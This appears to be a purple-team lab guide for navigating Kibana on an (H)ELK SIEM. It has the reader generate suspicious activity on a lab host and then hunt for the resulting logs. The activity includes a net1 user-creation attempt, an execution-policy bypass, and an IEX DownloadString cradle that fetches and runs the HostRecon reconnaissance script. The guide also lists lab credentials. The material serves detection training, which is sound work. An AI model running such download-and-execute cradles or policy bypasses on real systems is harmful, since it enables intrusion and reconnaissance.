L0350 Navigating Kibana
Kibana is the web interface frontend for the Elastic stack. This interface provides a multitude of configuration options and visibility for the ingestors associated with the Elastic stack.
This short guide provides a cursory overview of the Kibana interface, discovery options, dashboards, and search functions.
Access the Kibana Discovery Dashboard interface and navigate its various form controls.
Kibana Navigation
In L0340 you accessed Kibana to verify the threat optics pipelines were operating correctly. Use the same connection methods to login to Kibana for L0350.
Login to Member Server (WS01)
Connect via Remote Desktop to the Member Server (WS01).
See Lab L0200 for connection instructions.
Access Kibana on the (H)ELK SIEM
Using Chrome or Internet Explorer on Member Server, access the Kibana URI and login using the credentials below.
URL: https://10.10.98.20
Username: helk
Password: hunting
Kibana Components
There are several components that a purple teamer will use when hunting for IOC.s Use the following guide to better understand the typical use case of some of the dashboard controls.
Menu Dock
The left hand side of the Kibana application includes a menu dock. The default for this menu is "undocked". When the menu is undocked, the options are collapsed into icons when the menu is not in use. For first time users of Kibana, the icons may not be self-evident. Docking the menu will pin it to the right hand side of the application and display Icons and Text menu items to help the user navigate.
Dock the menu by first opening the menu by clicking on the "Expand" icon, and then clicking on the "Dock" icon. Both are at the bottom of the menu dock.
Discover Dashboard
Open the Discover Dasbhoard by selecting the "Discover" option from the menu dock. When the Discover Dashboard opens, take note of the currently selected index pattern. The index pattern is the initial filter that applies to the Discover Dashboard.
The logs* index will typically include all data within ELK, however the ability to hunt effectively without selecting an initial filter may be hindered by the sheer amount of log volume.
Discover Filters
In the below image, note the three defined filters to further scope your hunting dataset.
- Top Left: The Search filter.
- Middle Left: Log Index
- Top Right: Time Filter
Clicking the "(change)" link on the Log Index will list the available log indices that (h)ELK has awareness of. Indices can be generated manually, imported from code, or automatically provisioned by ELK as new data pipelines are identified for the first time. Wild-card * selections are available when selecting an index and allow the hunter to perform hunts across multiple data schema (indices) at once.
Kibana Interface Continued
In this step, we will perform actions on the Member Server (WS01) that will generate logs, eventually accessible via the Kibana instance.
Login to Member Server (WS01)
Connect via Remote Desktop to the Member Server (WS01).
See Lab L0200 for connection instructions.
PowerShell
Launch Windows PowerShell from the Windows Start Menu. See Lab L0250 for instruction on launching PowerShell.
Confirm User Context
First, confirm the correct user and system context by using the "whoami" and "hostname" commands.
whoami
hostname
Windows PowerShell
Copyright (C) 2016 Microsoft Corporation. All rights reserved.
PS C:\Users\itadmin> whoami
labs\itadmin <------------------------------VERIFY RESULT
PS C:\Users\itadmin> hostname
ws01 <-----------------------------------VERIFY RESULT
If the result of the above commands differs, please confirm you are operating on the correct system and user context.
Generate Suspicious Behavior
In powerShell, lets run regular command line tool and attempt to create a new user account named "appliedDemo" with the password "aptclass!". The command will ultimately fail to create the user account. This is expected.
net1 user appliedDemo aptclass! /add
PS C:\Users\itadmin> net1 user appliedDemo aptclass! /add
The password does not meet the password policy requirements. Check the minimum password length, password complexity and
password history requirements.
More help is available by typing NET HELPMSG 2245.
Despite the error message, was this enough activity to be visible in Kibana?
- Return to Kibana.
- Select the logs* index.
- In the search field, enter "appliedDemo"
The one command created multiple log entries that should no be visible in Kibana's interface. The logs were captured at various stages of system activity and by various optics, all forwarded and delivered through the optics pipeline and made available in Kibana.
If the logs are missing, perhaps the Date/Time filter is restricting your search scope.
Calendar Date/Time Control & Auto Refresh
If the net1 command was executed outside the window of occurrence, the Date/Time filter may need adjusted. This can be done from the Calendar control filter. On the right side of the Discover application, a refresh timer can also be set under the Refresh every option. This will check for results against the search query on a defined refresh interval. Select the Calendar Control on the Dashboard to see the filter options.
Note the highlighted fields on the Calendar Control. Modify the calendar control to enable an automatic refresh of the search query for 30 seconds.
Next, search for the term "powershell". Review the results in Kibana briefly. Then return to the PowerShell window on the Member Server WS01 and enter a powershell command.
[System.DirectoryServices.ActiveDirectory.Domain]::GetCurrentDomain()
PS C:\Users\itadmin> [System.DirectoryServices.ActiveDirectory.Domain]::GetCurrentDomain()
Forest : labs.local
DomainControllers : {dc01.labs.local}
Children : {}
DomainMode : Windows2012R2Domain
DomainModeLevel : 6
Parent :
PdcRoleOwner : dc01.labs.local
RidRoleOwner : dc01.labs.local
InfrastructureRoleOwner : dc01.labs.local
Name : labs.local
Return to the Kibana instance and wait approximately one minute. Was evidence returned of the PowerShell command executed on Ws01? Within two minutes, the screen should refresh and the new event logs be displayed at the top of the query table.
Column Field Controls
Open of the returned documents by pressing the down arrow near the document to expand its contents. Next to each field are a set of icons. Hovering the mouse cursor over the third icon will show a text-pop-up "Toggle column in table". Selecting this will add the field as a column in the current table of documents (records/rows). Selecting the option again will remove the field from the columns of the table.
Review the list of fields. Which fields could be most useful in being seen as a column in the table view? Find a field named "process_command_line". It might be difficult to find the specific document that has this specific field. Scroll through the entire field list displayed on the left hand side of the table. When you find it, hover your mouse over the field and press the "Add" button. This will add the field as a column in the table, even if the current queried documents do not contain that field.
Great! Onward to the next step.
Create and Hunt Suspicious Logs
Next, let’s make more interesting logs to ensure our optics infrastructure is working properly.
Login to Member Server (WS01)
Connect via Remote Desktop to the Member Server (WS01).
See Lab L0200 for connection instructions.
PowerShell
Launch Windows PowerShell from the Windows Start Menu. See Lab L0250 for instruction on launching PowerShell.
Confirm User Context
First, confirm the correct user and system context by using the "whoami" and "hostname" commands.
whoami
hostname
Windows PowerShell
Copyright (C) 2016 Microsoft Corporation. All rights reserved.
PS C:\Users\itadmin> whoami
labs\itadmin <------------------------------VERIFY RESULT
PS C:\Users\itadmin> hostname
ws01 <-----------------------------------VERIFY RESULT
If the result of the above commands differs, please confirm you are operating on the correct system and user context.
Suspicious Activity (Make Some Noise)
From the PowerShell window execute the following commands one at a time. • The first command will instantiate a PowerShell session that allows unsigned scripts to run. • The second command instantiates a memory cradle (memory carved for a PowerShell function). • The third command executes the HostRecon script and performs an analysis of the local system
Set-ExecutionPolicy bypass -Force
[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12
IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/dafthack/HostRecon/master/HostRecon.ps1')
Invoke-HostRecon |Out-File recon.txt
Please make note that the warning below is specific to an antivirus product and is expected in this context.
PS C:\Users\itadmin> Set-ExecutionPolicy bypass -Force
PS C:\Users\itadmin> [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12
PS C:\Users\itadmin> IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/dafthack/HostRecon
/master/HostRecon.ps1')
PS C:\Users\itadmin> Invoke-HostRecon |Out-File recon.txt
Get-WmiObject : Invalid class "AntiVirusProduct"
At line:195 char:11
+ $AV = Get-WmiObject -Namespace "root\SecurityCenter2" -Query "SEL ...
+ ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
+ CategoryInfo : InvalidType: (:) [Get-WmiObject], ManagementException
+ FullyQualifiedErrorId : GetWMIManagementException,Microsoft.PowerShell.Commands.GetWmiObjectCommand
PS C:\Users\itadmin>
You may receive an error as the tool attempts to enumerate information about the host. We are most interested in if this behavior was captured in the threat optics.
Next, return to the Kibana interface.
Hunting for PowerShell
Similar to before, we will search for the PowerShell activity that has been captured by the threat optics. In this case however, we will further initially filter our scope by changing the selected index.
Change Selected Index
Let's change the index that we expect PowerShell commands to be parsed into. With the previous optics configuration, the net result for Elastic is a index named logs-endpoint-winevent-powershell-*. Select that index from the list of indices.
Next, enter search term "HostRecon" and press enter.
Were you able to find the record of the PowerShell Invoke command?
You’ve completed the Optics-Infrastructure install, created suspicious logs and confirmed your ability to hunt for the suspicious logs. While these hunt scenarios use specific search terms, our goal was to only ensure that the optics had been installed and working properly. In future labs we will be hunting for specific threats with refined keywords and indexing.
